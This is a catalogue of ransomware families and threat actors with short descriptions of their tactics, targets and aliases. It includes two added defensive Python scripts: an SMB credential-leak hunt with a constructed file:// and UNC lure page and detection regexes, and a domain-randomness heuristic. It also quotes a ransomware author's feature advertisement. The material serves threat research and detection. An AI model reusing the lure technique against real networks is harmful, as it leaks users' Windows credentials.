
Ransomware

RanRans

ransomware

Rans0mLocked

ransomware

Ransed

ransomware

Ransoc

Ransomware Doesn't encrypt user files

Ransom Corp

Ransom Corp is an active extortion or ransomware group tracked by RansomLook.

Ransom Prank

ransomware

Ransom102

ransomware

Ransom32

Ransomware no extension change, Javascript Ransomware

RansomAES

ransomware

Ransombay

Ransombay is an active extortion or ransomware group tracked by RansomLook.

RansomBlox

ransomware

Ransomcartel

Ransomcartel is an active extortion or ransomware group tracked by RansomLook.

Ransomcortex

Ransomcortex is an active extortion or ransomware group tracked by RansomLook.

RansomCuck

ransomware

ransomedvc2

RansomedVC2, also known as RebornVC, is a rebrand of RansomedVC under new leadership.

RansomEXX

We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim’s name.

Ransomhouse Group

Ransomhouse is a sophisticated ransomware-as-a-service (RaaS) group that emerged in late 2021. The group employs double extortion tactics, first encrypting victim networks then threatening to publish exfiltrated data if ransom demands are not met. Ransomhouse operates a Tor-based leak site to name-and-shame non-paying victims. The group tries to portray a professional image, offering personalized Onion chat links for negotiation and advice to bolster victims' security. Technically, Ransomhouse utilizes specialized tools like Babuk ransomware, and its variant Mario ransomware. It uses MrAgent to automate ransomware deployment across large environments. The group has targeted entities worldwide, with a focus on Western industries like technology and industrials.[[Sogeti Global February 28 2024](/references/61b478d2-315c-4b94-8be2-4614003ece9f)][[Trellix RansomHouse February 14 2024](/references/47214846-49b2-44a1-a696-cca24d9caa56)]

RansomHouse

This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.

RansomHub Ransomware Actors

RansomHub is an extortion group that regularly republicizes victim data allegedly stolen in other ransomware groups' attacks, but it is also believed to have developed an original ransomware payload.[[BroadcomSW June 5 2024](/references/3fa49490-cb22-4362-bf48-eaba9e83e6f5)][[The Record RansomHub June 3 2024](/references/1e474240-bd12-4472-8e69-1631b0e4c102)] This object reflects the ATT&CK Techniques and/or associated Software & Campaigns linked to attacks by actors deploying RansomHub ransomware.

RansomHub

RansomHub is a dominant ransomware-as-a-service operation that emerged in 2024 and quickly became the most prolific group with 736 disclosed victims.

RansomLock

Ransomware Locks the desktop

RansomMine

ransomware

Ransomnix

ransomware

RansomPlus

The author of this ransomware is known as sergej. The ransom is 0.25 bitcoin for the return of files. The ransom note is in English and the ransomware is used worldwide. It is spread with the help of email spam, fake ads, fake updates and infected install files.

RansomUserLocker

ransomware

RansomVC

Ransomed.VC burst onto the scene with a well-orchestrated PR campaign, encompassing a clearnet site and multiple communication channels including Telegram and Twitter/X profiles. Their operations are heavily inclined towards exploiting GDPR penalties as a method of extortion, threatening victims with potential legal repercussions in case of data leaks.

ransomware blog

Also known as MedusaLocker

RansomWarrior

ransomware

Ranzy

Ranzy is an active extortion or ransomware group tracked by RansomLook.

Rapid 2.0

ransomware

Rapid 3.0

ransomware

Rapid Action Battalion

Rapid Action Battalion – Intelligence Wing (RAB-IW)

Rapid-Gillette

ransomware

Rapid

ransomware

Rapture

Rapture is an active extortion or ransomware group tracked by RansomLook.

RaRuCrypt

ransomware

RarVault

Ransomware

Raspberry Typhoon

Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets range from defense- and intelligence-related ministries to economic- and trade-related ministries.

RASPITE

Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.
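The RASPITE, DYMALLOY and ALLANITE technique described above relies on a page element that points at an attacker-controlled SMB share, so that a Windows client fetching it authenticates outward and leaks NTLM credentials. Two things are worth hunting for: internal hosts opening SMB to non-internal addresses, and `file://` or UNC references in web content. The following is an added example, not code from the page or from Dragos; the internal address ranges, the flow-log format and the lure page are assumptions and the records are constructed.

```python
"""Hunt for the forced-SMB credential-capture pattern on the wire and in content.

Added example, not code from the page or from Dragos. The internal ranges, the
flow log format (timestamp src dst dport proto action) and the sample HTML are
assumptions; adjust them to your own environment and log source.
"""
import ipaddress
import re

# Assumption: the organisation's internal address space is RFC 1918 only.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {139, 445}

# Constructed flow records (not real traffic): one host reaches an external
# SMB server right after browsing; another is blocked at the perimeter.
SAMPLE_FLOWS = """\
2018-07-30T10:15:02Z 10.20.5.17 10.20.5.2 445 TCP ALLOW
2018-07-30T10:15:09Z 10.20.5.17 203.0.113.45 445 TCP ALLOW
2018-07-30T10:15:10Z 10.20.5.17 203.0.113.45 139 TCP ALLOW
2018-07-30T10:16:30Z 10.20.7.3 198.51.100.20 443 TCP ALLOW
2018-07-30T10:17:01Z 10.20.7.3 192.0.2.9 445 TCP DENY
"""

# Constructed lure page (not a real sample): an image and a stylesheet point at
# an external host via file:// and UNC references, which make Windows clients
# attempt SMB and offer NTLM credentials.
SAMPLE_HTML = r'''<html><body>
<img src="file://203.0.113.45/share/logo.png">
<a href="https://www.example.com/about">About</a>
<link rel="stylesheet" href="\\203.0.113.45\pub\style.css">
</body></html>'''

FILE_URL_RE = re.compile(r'file://([^/"\'\s]+)', re.IGNORECASE)
UNC_PATH_RE = re.compile(r'\\\\([^\\"\'\s]+)\\')


def is_internal(ip):
    """True if the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Parse whitespace-separated flow records into dicts."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst, dport, proto, action = line.split()
        flows.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport),
                      "proto": proto, "action": action})
    return flows


def external_smb_flows(flows):
    """Flows from internal hosts to non-internal SMB ports. Denied flows are
    kept: a blocked attempt still means a client tried to authenticate outward."""
    return [f for f in flows
            if f["dport"] in SMB_PORTS
            and is_internal(f["src"]) and not is_internal(f["dst"])]


def find_smb_lure_hosts(html):
    """Hosts referenced through file:// URLs or UNC paths in page content."""
    hosts = set(FILE_URL_RE.findall(html)) | set(UNC_PATH_RE.findall(html))
    return sorted(hosts)


if __name__ == "__main__":
    for f in external_smb_flows(parse_flows(SAMPLE_FLOWS)):
        print(f"{f['ts']} {f['src']} -> {f['dst']}:{f['dport']} {f['action']}")
    print("lure hosts:", find_smb_lure_hosts(SAMPLE_HTML))
```

Any hit from the first function is worth treating as a credential-exposure event for that host's logged-on user, whether or not the perimeter allowed the connection; the content check is useful for proxy logs and for reviewing pages on a suspected strategic-web-compromise site.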

RASTAKHIZ

Hidden Tear variant discovered in October 2016. After activation, it gives victims an unlimited amount of time to gather and pay the requested ransom. Unlock keys and the victim's responses are exchanged through a Gmail address.

RATPAK SPIDER

In July 2018, the source code of Pegasus, RATPAK SPIDER’s malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia’s financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.

Raznatovic

Raznatovic is an active extortion or ransomware group tracked by RansomLook.

RAZOR TIGER

An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, the actor uses custom implementations of exploits for known vulnerabilities (such as CVE-2017-11882) and later deploys a PowerShell payload in the final stages.

Razor

Razor was discovered by dnwls0719 and is part of the Garrantydecrypt ransomware family. Like many programs of this type, Razor encrypts files (making them unusable and inaccessible), renames them, creates a ransom note and changes the victim's desktop wallpaper. It renames files by appending the ".razor" extension, so "1.jpg" becomes "1.jpg.razor", and so on. The ransom note is a text file named "#RECOVERY#.txt" containing instructions on how to contact Razor's developers and other details. According to the note, all files have been encrypted, and information on how to purchase a decryption tool can be obtained by contacting the developers via razor2020@protonmail.ch, Jabber (razor2020@jxmpp.jp) or ICQ (@razor2020) and waiting for further instructions. They will most likely name a price for a decryption tool and/or key and provide a cryptocurrency wallet address for the payment. Paying is never advisable: it is common for ransomware developers not to provide decryption tools even after payment. Because ransomware of this kind uses strong encryption algorithms, its developers are usually the only ones holding the keys, so in most cases the only free and safe option is to restore files from a backup. Note that files remain encrypted after the ransomware is uninstalled; removal only prevents further encryption.

Razy

Ransomware

Rebel Jackal

This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.

Reckless Rabbit

Reckless Rabbit lures victims into investment scams through malicious Facebook advertisements that lead to fake news articles with embedded web forms for personal information collection. They create domains using RDGA patterns, including random characters and English words, and configure wildcard DNS responses to obscure their active subdomains. The actor employs validation checks to filter out traffic from specific countries, enhancing their operational security. Their investment scam platforms often feature fake endorsements to increase credibility among potential victims.
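Both Prolific Puma and Reckless Rabbit register domains from an RDGA, and Reckless Rabbit in particular mixes random characters with English words. Neither actor's generation algorithm is on this page, so the following is not a signature for either; it is an added triage heuristic, not code from the page or from Infoblox, that scores the registrable label of a domain by how random its non-dictionary residue looks. The wordlist, the feature weights and the sample domains are assumptions for illustration.

```python
"""Triage heuristic for RDGA-style domains (random labels, or English words
glued to random characters).

Added example, not code from the page or from Infoblox. The wordlist, the
feature weights and the sample domains are assumptions; a real deployment
would use a larger dictionary and tune thresholds on its own passive-DNS data.
"""
import math
from collections import Counter

VOWELS = set("aeiou")
# Small constructed wordlist standing in for a dictionary.
COMMON_WORDS = {"news", "invest", "profit", "market", "link", "click", "secure",
                "login", "bank", "crypto", "trade", "today"}
# Assumed weights; "few vowels" and "digits mixed into letters" are the strong signals.
WEIGHTS = {"few vowels": 2, "digits mixed into letters": 2,
           "long consonant run": 1, "high entropy": 1}

# Constructed candidates (not real actor infrastructure).
SAMPLE_DOMAINS = [
    "example.com",
    "wikipedia.org",
    "secure-login-portal.com",   # dictionary-looking words only
    "xk7qzv2pmw9r.net",          # random characters
    "invest-news-k3p9qz.com",    # words with a random tail
    "todaymarket7q2x.info",
]


def registrable_label(domain):
    """Second-level label. Assumption: no multi-part public suffixes (e.g. .co.uk)."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def strip_words(label, words):
    """Greedily remove known words (longest match at each position) and return
    the residue. Word-plus-random RDGAs leave the random part behind."""
    s = label.replace("-", "")
    out, i = [], 0
    while i < len(s):
        match = max((w for w in words if s.startswith(w, i)), key=len, default=None)
        if match:
            i += len(match)
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def longest_consonant_run(s):
    best = run = 0
    for ch in s:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def score_label(label, words=COMMON_WORDS):
    """Return (score, residue, reasons) for one registrable label."""
    residue = strip_words(label, words)
    alnum = "".join(ch for ch in residue if ch.isalnum())
    letters = [ch for ch in alnum if ch.isalpha()]
    digits = [ch for ch in alnum if ch.isdigit()]
    reasons = []
    if len(alnum) < 4:                       # too short to judge
        return 0, residue, reasons
    if len(letters) >= 2 and sum(ch in VOWELS for ch in letters) / len(letters) < 0.25:
        reasons.append("few vowels")         # English averages well above this
    if len(digits) >= 2 and letters:
        reasons.append("digits mixed into letters")
    if longest_consonant_run(alnum) >= 5:
        reasons.append("long consonant run")
    if shannon_entropy(alnum) >= 3.2:
        reasons.append("high entropy")
    return sum(WEIGHTS[r] for r in reasons), residue, reasons


def flag_rdga_candidates(domains, threshold=2, words=COMMON_WORDS):
    """Domains whose label scores at or above the threshold, with the reasons."""
    flagged = []
    for d in domains:
        score, residue, reasons = score_label(registrable_label(d), words)
        if score >= threshold:
            flagged.append((d, score, reasons))
    return flagged


if __name__ == "__main__":
    for domain, score, reasons in flag_rdga_candidates(SAMPLE_DOMAINS):
        print(f"{domain}: score {score} ({', '.join(reasons)})")
```

This is a first-pass filter, not a verdict: short brand names with few vowels will score, and a real pipeline would combine the score with registration age, registrar and nameserver clustering, and the wildcard-DNS check Reckless Rabbit's infrastructure invites (resolving a random subdomain and seeing whether it answers).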

Reconnaissance General Bureau

Reconnaissance General Bureau

Rector

Ransomware

Red Alert

It is directed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. It poses as software from "Microsoft Corporation". Based on HiddenTear.

Red Charon

Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Because these attacks shared similar behaviour profiles (tactics, techniques and procedures, or TTPs) with each other and with previously documented cyberattacks, CyCraft assesses with high confidence that they were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. The name stands for the synthesis of hacker tools the group was seen to use, such as a skeleton key malware that contained code extracted from both Dumpert and Mimikatz. CyCraft dubbed the whole campaign, which used the skeleton key attack from late 2018 to late 2019, Operation Skeleton Key.

Red Dev 17

In 2021, PwC started tracking a series of intrusions under the moniker Red Dev 17 that they assess were highly likely conducted by a China-based threat actor. Their analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17's observed targets are mainly in India, and include the Indian military, a multinational India-based technology company, and a state energy company. PwC assesses that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 is a user of the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. PwC identified capability and infrastructure links between Red Dev 17 and the threat actor they call Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot) and with ShadowPad C2 servers. At this time, they do not have sufficient evidence to directly link Red Dev 17 to any of these threat actors. However, they assess with realistic probability that Red Dev 17 operates within a cluster of threat actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.

Red-Lili

RED-LILI is an active threat actor identified by the Checkmarx SCS research team. It has been publishing malicious packages on npm and PyPI and has recently automated the creation of npm user accounts for package publication. The Checkmarx team has detected around 1,500 malicious packages associated with RED-LILI and has continuously disclosed its findings to the respective security teams.

Red Menshen

Since 2021, Red Menshen, a China-based threat actor, has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education and logistics sectors, using a custom backdoor referred to as BPFDoor. The actor uses a variety of tools in its post-exploitation phase, including custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open-source tools such as Mimikatz and Metasploit to aid lateral movement across Windows systems. It has also been seen sending commands to BPFDoor victims via Virtual Private Servers (VPSs) hosted at a well-known provider; these VPSs are in turn administered via compromised routers based in Taiwan, which the actor uses as VPN tunnels. Most observed Red Menshen activity took place Monday to Friday (none on weekends), with most communication between 01:00 and 10:00 UTC. This pattern suggests a consistent 8- to 9-hour activity window, with a realistic probability that it aligns with local working hours.

Red Nue

Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAT backdoor, also known as ReverseWindow. LootRAT has variants for Windows and macOS (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue's victimology.

Red Ransomware

Red Ransomware is an active extortion or ransomware group tracked by RansomLook.

RedAlpha

Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.

RedAnts Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

RedBoot

ransomware

RedDelta

RedDelta is a likely Chinese state-sponsored threat activity group targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident through the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as throughout 2022 through the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine. During the 3-month period from September through November 2022, RedDelta regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure. RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.

RedEye

Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives the author's contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system. The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.

Redfly

Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.

RedFox

ransomware

RedGolf

Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.

RedJuliett

RedJuliett is a likely Chinese state-sponsored threat actor targeting government, academic, technology, and diplomatic organizations in Taiwan. They exploit vulnerabilities in network edge devices for initial access and use SQL injection and directory traversal exploits against web and SQL applications. The group operates from Fuzhou, China, and aims to support Beijing's intelligence collection on Taiwan's economic and diplomatic relations. RedJuliett has also expanded its operations to compromise organizations in other countries such as Hong Kong, Malaysia, and the United States.

Redkeeper

ransomware

RedKitten

RedKitten is a campaign targeting Iranian interests, particularly NGOs and individuals documenting human rights abuses, first observed in January 2026. The malware utilizes GitHub and Google Drive for configuration and payload retrieval, while employing Telegram for command and control. Although precise attribution is challenging, the activity exhibits TTPs associated with Iranian state-sponsored actors and linguistic indicators suggest a Farsi-speaking threat actor. RedKitten is characterized as an AI-accelerated campaign exploiting the humanitarian crisis surrounding Iran’s Dey 1404 protests.

RedRoman

ransomware

RedRum

ransomware

Redshot

ransomware

RedStinger

In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.

Reetner

ransomware

REF2924

A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware, an HTTP listener written in C# dubbed Naplistener by the researchers, in attacks against victims operating in southern and southeast Asia. According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.

REF5961

Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.

REF7707

REF7707 is a cyber campaign targeting government entities, particularly a foreign ministry in South America, utilizing malware families such as FinalDraft, GuidLoader, and PathLoader for persistence and lateral movement. The threat actor employs the Microsoft Graph API for C2 communication, blending malicious traffic with legitimate activity to evade detection. Despite their technical sophistication, REF7707 operators exhibited poor operational security, leading to the exposure of their infrastructure and malware. Their tactics enable the extraction of sensitive data, including passwords and Active Directory information, facilitating ongoing espionage activities.

Regional Anti-Terrorist Structure

Regional Anti-Terrorist Structure (RATS)

RegretLocker

RegretLocker is a new ransomware that has been found in the wild in the last month and that does not only encrypt normal files on disk like other ransomware. When running, it specifically searches for VHD files, mounts them using the Windows Virtual Storage API, and then encrypts all the files it finds inside those VHD files.

RekenSom

ransomware

RektLocker

Ransomware

Rektware

GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension.

Relic

Relic is an active extortion or ransomware group tracked by RansomLook.

Relock

ransomware

RemindMe

Ransomware

RenameX12

ransomware

RenLocker Ransomware (FAKE)

It is spread using email spam, fake updates, attachments and so on. It claims to encrypt all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The files don’t actually get encrypted; their names get changed using this formula: [www-hash-part-]+[number]+[.crypter]

RensenWare

ransomware

Rentyr

ransomware

Republic of China Military Police

Military Police Command (ROCMP)

Research and Analysis Wing

Research and Analysis Wing (R&AW)

Research Division of the Prime Minister's Department

Malaysian External Intelligence Organisation (Foreign Intelligence)

RestoLocker

ransomware

ResumeLooters

Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to execute it on the administrators’ device to obtain admin credentials. While the group was able to execute the XSS script on some visitors’ devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential thefts.

Resurrection

ransomware

Retis

ransomware

RetMyData

ransomware

Returned Libra

Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during their operations are PwnRig or DBUsed, which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group's software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scraping.

Revenge Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. CryptoMix / CryptFile2 variant.

RevengeHotels

RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.

Reveton ransomware

A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.

REvil

REvil is a Russian ransomware-as-a-service operation that has targeted major corporations worldwide.

Revolution

ransomware

Reynolds

Reynolds is an active extortion or ransomware group tracked by RansomLook.

Reyptson

ransomware

RGB-TEAM

RGB-TEAM is a previously unknown Russian-speaking threat actor. They describe themselves as “a community of anonymous hacktivists fighting for freedom.” The group stated that it doesn’t have enemies in the U.S., Europe, “in the East, or in the West.”

Rhino

ransomware

Rhysida Ransomware Actors

This object represents the behaviors associated with operators of Rhysida ransomware, which is licensed on a ransomware-as-a-service ("RaaS") basis. Various affiliated ransomware operators likely do not operate as a cohesive unit. The Rhysida RaaS operation has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.[[HC3 Analyst Note Rhysida Ransomware August 2023](/references/3f6e2821-5073-4382-b5dd-08676eaa2240)] **Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]

rhysida

Rhysida is a ransomware-as-a-service (RaaS) group that emerged in May 2023. The group utilizes a namesake ransomware, using phishing attacks and Cobalt Strike to breach the targets' networks and deploy their payloads. The group threatens to publicly distribute exfiltrated data if the ransom is not paid, and it is worth mentioning that Rhysida is still in the early stages of development. The ransomware leaves PDF notes in the affected folders, instructing victims to contact the group through its portal, and payment is made via Bitcoin. After encryption, the ransomware appends the extension ".ryshida" to encrypted files. Regarding the encryption method, Trend Micro published an analysis stating that the ransomware uses a 4096-bit RSA key and AES-CTR. In addition to the encryption method, Trend Micro published an analysis of the Rhysida ransomware attack chain. Finally, the group has a website on the Tor network listing the companies that have been breached.

RIDDLE SPIDER

According to CrowdStrike, RIDDLE SPIDER is the operator behind the Avaddon ransomware.

Rijndael

ransomware

RIP (Phoenix) Ransomware

It’s directed at English-speaking users, therefore it is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

RipperSec

RipperSec is a pro-Palestinian, likely Malaysian hacktivist group created in June 2023, known for conducting DDoS attacks, data breaches, and defacements primarily targeting government and educational websites, as well as organizations perceived to support Israel. The group has claimed 196 DDoS attacks, with a significant portion directed at Israel, and utilizes a tool called MegaMedusa for their operations. RipperSec operates on Telegram, where it has amassed over 2,000 members, and collaborates with various like-minded hacktivist groups. Their attack strategy relies heavily on community involvement rather than sophisticated infrastructure.

risen

Risen, which is a fully optimized and high-speed program, is the result of our years of experience in the field of malware writing. Risen is written in the C language and completely using WinAPI. We produced many products with different features and options, but we came to the conclusion that none of the options have the benefit and efficiency they should; so, instead of spending time on useless and inefficient options, we decided to spend all our time on the strength, speed and security of our cryptography, and that's how we created Risen. Software features in version 1:

- Encryption security, utilizing ChaCha20 and RSA 2048 algorithms.
- High encryption speed and software optimization.
- Compatible with all versions of Windows on any hardware without any issues.
- Automatic option settings; it is easy to use and the default configuration is set to the best mode.
- Utilization of the thread pool method and queue creation for encryption.
- A powerful file unlocker, unlocking files without closing processes.
- Safe deletion of backups, shadow copies, and all Windows logs.
- A blog, leak website, and management panel on TOR for leaking data of non-paying companies.

RNS

ransomware

Roaming Mantis

According to new research by Kaspersky's GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user's traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.

Roaming Tiger

Roaming Tiger is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Robbing Hood

Robbing Hood is an active extortion or ransomware group tracked by RansomLook.

RobinHood

Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrates data.

Rocket Kitten

Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.

Roga

It’s directed at English-speaking users, therefore it is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The hacker requests the ransom in Play Store cards. https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png

Rogue HT

ransomware

Rokku

Ransomware possibly related to Chimera.

Romanian Intelligence Service

Romanian Intelligence Service (SRI) – Serviciul Român de Informații

RomCom

ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group's adaptability and growing sophistication.

Rontok

ransomware

Rook

Ransomware

Root

Root is an active extortion or ransomware group tracked by RansomLook.

RoshaLock

Ransomware. Stores your files in a password-protected RAR file.

RotorCrypt(RotoCrypt, Tar) Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Royal Canadian Mounted Police

Royal Canadian Mounted Police (RCMP) Intelligence Division

Royal Ransomware Actors

